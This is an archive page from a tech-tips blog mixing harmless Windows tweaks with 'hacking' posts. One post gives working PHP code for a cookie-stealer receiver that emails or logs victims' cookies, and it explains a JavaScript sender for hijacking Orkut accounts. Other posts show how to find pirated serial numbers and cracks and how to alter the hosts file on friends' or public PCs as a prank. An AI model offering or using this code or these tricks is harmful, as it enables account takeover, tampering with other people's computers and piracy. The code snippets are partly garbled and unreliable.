Best 2 Know

The Ultimate Blogging Resource

  • Advertising
  • WebHosting
  • Contact Us
  • Blogger
    • Blogger Templates
    • Blogger Tutorials
  • Browser
    • Firefox
    • Google Chrome
  • Google
  • Internet
    • Facebook
    • Twitter
  • Thesis
  • Windows
  • WordPress
    • WordPress Themes
    • WordPress Plugins
  • More
    • Linux
    • Review
    • Solutions
    • Announcements

Author: Ritesh Sanap

Hack passwords in Firefox

Whenever you log in to a website using your username and password, you’ll be prompted by Firefox whether you’d like Firefox to remember this password.


If you click on Remember, the next time you visit the website, it’ll automatically enter the username and password for your convenience.

Now, back to the topic. Let’s say you saved your GMail password in Firefox. After months or years gone by and you don’t remember the password you set for my GMail. You started to panic and desperately need to get back your GMail password.

Don’t worry, here’s how you can find the hidden GMail password in Firefox.

Firefox is much better than Internet Explorer in terms of managing “remembered” logins. In Internet Explorer, there is no built-in feature where you can manage or view your saved login information. That’s why you need third party tools to reveal the passwords hidden under asterisks. As for Firefox, you can access remembered passwords with a few clicks.


To view your remembered passwords in Firefox browser, go to Tools, and click on Options. Go to Security tab and click on the Show Passwords button. A remember password dialog box will appear. Click on the Show Passwords button again and a new column with password will appear.

March 12, 2008 Ritesh Sanap Internet

Trick your webpage

A simple text file edit makes sites redirect to another. When you type address in address bar in any browser and enter it then it will display another web page, for example:- when you type Google.com you will be redirected to yahoo.com

Instructions to do:

1) Go to this directory [c:\windows\system32\drivers\etc], directory may change according to drive used for os installation
2) then hit enter
3) find a file named “hosts”
4) Right click on it and open with word pad.
5) In the last link of the document type the IP* address of yahoo space www.Google.com (Vice versa for other sites)
6) now save it
7) restart the browser if its already running
8) Now try it, It works perfect

IP*: to find IP address of that website Goto start ->Run > type cmd > enter. Now you have a new window on desktop. On that type this without cotes “ping www. yahoo.com”
replace yahoo.com with your preferred site and then enter it

Live example:

Recover Option: Repeat the first four steps and remove the last line that you have inserted and save it and restart browser. Now its back to normal

try this on your frieds pc and public pc and make them blink.

March 12, 2008 Ritesh Sanap Internet

Use Google to get Serial No of any Software

Most of the people downloading trial and using it, only after the expiration of trial they try for crack, Serial No, Keygen, Patch….

But many don’t known where to get Serial No, Some websites may be infect your system with Trojan horse, Viruses, Ad ware, Spy ware….

So for beginners this is a simply way to find hack with less effort and it saves time to, But make sure you have anti virus activated before trying to get some Serials, Patches to avoid data loss

Just follow the steps as instructed below

1) Go to http://www.google.com
2) type this syntax in search bar ” 94FBR”
3) Replace Product name with desired software and leave a space then type 94FBR
4) Press enter, thats it

Now you receive Many pages which contains Serial no, Crack, Patches….

Just make a try, this simple trick works for many people

March 12, 2008 Ritesh Sanap Internet, Windows Software

How to make cookies and hack Orkut accounts

Written by The Invisible

Introduction

Exactly how does a cookie stealer work, anyway? There are two components in a cookie stealer: the sender and the receiver.

The sender can take many forms. In essense, it’s just a link to the receiver with the cookie somehow attached. It can sometimes be difficult to find a way to implement the sender.

The receiver, as the name suggests, is a device which receives the cookie from the sender. It can also take several forms, but the most common is that of a PHP document, most commonly found residing on some obscure webserver.

Step One: The Code

Coding a receiver is the part with which most newbies struggle. Only two things are needed to make a receiver: a webhost which supports PHP, and Notepad (see the end of the text for a link to some free PHP hosts).

As I said in the introduction, the receiver’s job is to receive the cookie from the sender. The easiest way to send information to a PHP document is by using the HTTP GET method, which appends information to the end of the URL as a parameter (for example, “page.php?arg1=value”). PHP can access GET information by accessing $HTTP_GET_VARS[x], where x is a string containing the name of the argument.

Once the receiver has the cookie, it needs a way to get that cookie to you. The two most common ways of doing this are sending it in an email, and storing it in a log. We’ll look at both.

First, let’s look at sending it in an email. Here is what such a beast would look like (functioning code):

$cookie = $HTTP_GET_VARS[“cookie”]; // line 2
mail(” me@mydomain.comThis e-mail address is being protected from spam bots, you need JavaScript enabled to view it “, “Cookie stealer report”, $cookie); // line 3
?> // line 4

Line 1 tells the server that this is indeed a PHP document.
Line 2 takes the cookie from the URL (“stealer.php?cookie=x”) and stores it in the variable $cookie.
Line 3 accesses PHP’s mail() function and sends the cookie to ” me@mydomain.comThis e-mail address is being protected from spam bots, you need JavaScript enabled to view it ” with the subject of “Cookie stealer report”.
Line 4 tells the server that the PHP code ends here.

Next, we’ll look at my preferred method, which is storing the cookie in a logfile. (functioning code)

$cookie = $HTTP_GET_VARS[“cookie”]; // line 2
$file = fopen(‘cookielog.txt’, ‘a’); // line 3
fwrite($file, $cookie . “\n\n”); // line 4
?> // line 5

Lines 1 and 2 are the same as before.
Line 3 opens the file “cookielog.txt” for writing, then stores the file’s handle in $file.
Line 4 writes the cookie to the file which has its handle in $file. The period between $cookie and “\n\n” combines the two strings as one. The “\n\n” acts as a double line-break, making it easier for us to sift through the log file.
Line 5 is the same as before.

Step Two: Implementing the Stealer

The hardest part (usually) of making a cookie stealer is finding a way to use the sender. The simplest method requires use of HTML and JavaScript, so you have to be sure that your environment supports those two. Here is an example of a sender.

// Line 3

Line 1 tells the browser that the following chunk of code is to be interpereted as JavaScript.
Line 2 adds document.cookie to the end of the URL, which is then stored in document.location. Whenever document.location is changed, the browser is redirected to that URL.
Line 3 tells the browser to stop reading the code as JavaScript (return to HTML).

There are two main ways of implementing the sender:

You can plant your sender where the victim will view it as an HTML document with his browser. In order to do that, you have to find some way to actually post the code somewhere on the site.

March 12, 2008 Ritesh Sanap Internet Orkut tricks

Setting Windows Explorer Background Images

“Windows Explorer Background Images
… Ever get confused which hard drive you are working in? Well, the Windows Explorer can put different backgrounds on them to help you remember. Just create a file at the root of your drive called desktop.ini and place the following in it:

[ExtShellFolderViews]
{BE098140-A513-11D0-A3A4-00C04FD706EC}={BE098140-A513-11D0-A3A4-00C04FD706EC}
[{BE098140-A513-11D0-A3A4-00C04FD706EC}]
Attributes=1
IconArea_Image=background.gif

Next, find a washed-out image or create a light color in MSPAINT and put it there called background.gif. (be sure to make the file type a GIF too) Open Windows Explorer and see your creation! … “

This is kind of neat… It is a very quick and simple way to customize a folder, including a drive’s root folder.

Some notes:
1. The change is not recursive. So the background image does not show in subfolders.
2. The background.gif will tile.
3. Windows Explorer doesn’t need to be restarted for this change to take effect (i.e. the desktop.ini is read each time the folder is displayed)

March 12, 2008 Ritesh Sanap Windows

Hide Your IP Using Proxy Server

Just Follows these Steps

Go to http://www.anonymouse.org

2. Type the website address there after selecting the language.
3. Then press Enter.
4. You are now viewing the website anonymously.
5. The Website Administrator does not know your IP Address. He sees a IP Address from some part of the world.

February 29, 2008 Ritesh Sanap Internet

Use system restore when you cant boot your system

If your system has failed to the point where you cannot access the Windows GUI either through booting normally or through safe mode, you may still have the chance to use the System Restore feature if you have it enabled, by running it form the command prompt. To do this:

Restart your computer and press F8 after the POST screen to bring up the Windows XP boot menu. Choose ‘boot in safe mode with command prompt.’

If your system gets to the command prompt successfully, type ‘%systemroot%\system32\restore\rstrui.exe’ and then press enter. Follow the onscreen instructions to restore your computer to a previous saved point.

February 29, 2008 Ritesh Sanap Windows

Reducing the Wait Time To Shut Down your PC

When you start to shut down Windows XP, it has to quit, or “kill,” any live applications or processes that are currently running.
So close all applications first. However, some applications and processes are always running in the background.
You can reduce the amount of time that Windows XP waits for those applications and processes to close before Windows XP kills them.
Edit three different Registry settings to change this:
1. Open the Registry Editor.

2. Navigate to HKEY_CURRENT_USER\Control Panel\Desktop. Select WaitToKillAppTimeout and set the value to 1000.

3. Select the HungAppTimeout value and set it to 1000 as well.

4. Navigate to HKEY_USERS\.DEFAULT\Control Panel\Desktop. Set the WaitToKillAppTimeout and set the value to 1000. Select the HungAppTimeout \newline value and set it to 1000 as well.

5. Navigate to HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control. Select the WaitToKillServiceTimeout value and set it to 1000.

6. Close the Registry Editor

That’s it..u r done

February 29, 2008 Ritesh Sanap Windows

Posts pagination

Previous page Page 1 … Page 45 Page 46 Page 47 … Page 52 Next page

Currently Trending

  • How to download Specific parts of YouTube videos
    How to download Specific parts of YouTube videos
  • Windows Vista CD key
    Windows Vista CD key
  • How to retrieve my Demonoid username
    How to retrieve my Demonoid username
  • How to add Logo to Thesis theme
    How to add Logo to Thesis theme
  • How to Delete Feedbacks from JetPack Contact Form
    How to Delete Feedbacks from JetPack Contact Form
  • List Of All 255 Keyboard All Alt Key Codes
    List Of All 255 Keyboard All Alt Key Codes
  • h4x0r ( Hacker ) - Blogger Template
    h4x0r ( Hacker ) - Blogger Template

Get Latest post in your Inbox

Random Posts

Top 5 Jquery Slide Gallery

June 12, 2010 By Ritesh Sanap 2 Comments

How to get Start Menu back in Windows 8

November 23, 2012 By Ritesh Sanap 2 Comments

Theme Request or Template Request

June 5, 2009 By Ritesh Sanap 3 Comments

Set as Homepage Link for bloggers

June 10, 2009 By Ritesh Sanap 1 Comment

How to remove Previous and Next entries in thesis

May 21, 2011 By Ritesh Sanap Leave a Comment

WordPress

HTTP2 Server Push for W3 Total Cache Minify plugin

August 17, 2016 By Ritesh Sanap 5 Comments

How to Disable Emojis in WordPress

January 6, 2016 By Ritesh Sanap Leave a Comment

JetPack Related posts and Sharing not working with NGINX

November 10, 2015 By Ritesh Sanap Leave a Comment

Simply Pure – WordPress Theme

November 2, 2014 By Ritesh Sanap 2 Comments

Advanced What should we Write about next? – WordPress Plugin

July 28, 2014 By Ritesh Sanap Leave a Comment

How to Disable Self Pingback or TrackBack

January 16, 2014 By Ritesh Sanap Leave a Comment

BlueStrap – WordPress Theme

January 1, 2014 By Ritesh Sanap 15 Comments

How to Create Multiple Excerpts in WordPress

December 24, 2013 By Ritesh Sanap Leave a Comment

How to Disable Auto Update in WordPress

November 21, 2013 By Ritesh Sanap Leave a Comment

How to Delete Feedbacks from JetPack Contact Form

November 19, 2013 By Ritesh Sanap 9 Comments

Recent Posts

  • HTTP2 Server Push for W3 Total Cache Minify plugin
  • How to show hidden files and folders in Mac OS X
  • How to Disable Emojis in WordPress
  • Canva – Online Photo Editor
  • JetPack Related posts and Sharing not working with NGINX

Archives

Recommends

  • DigitalOcean – Cloud Hosting
  • Dropbox – Cloud Storage
  • Elegant Themes – WordPress Themes
  • LastPass – Password Manager
  • Like us on Facebook
  • Follow on Twitter
  • +1 on Google
  • Subscribe via Email
  • RSS Feed

© 2025 Best 2 Know · All Rights Reserved · We ♥ DigitalOcean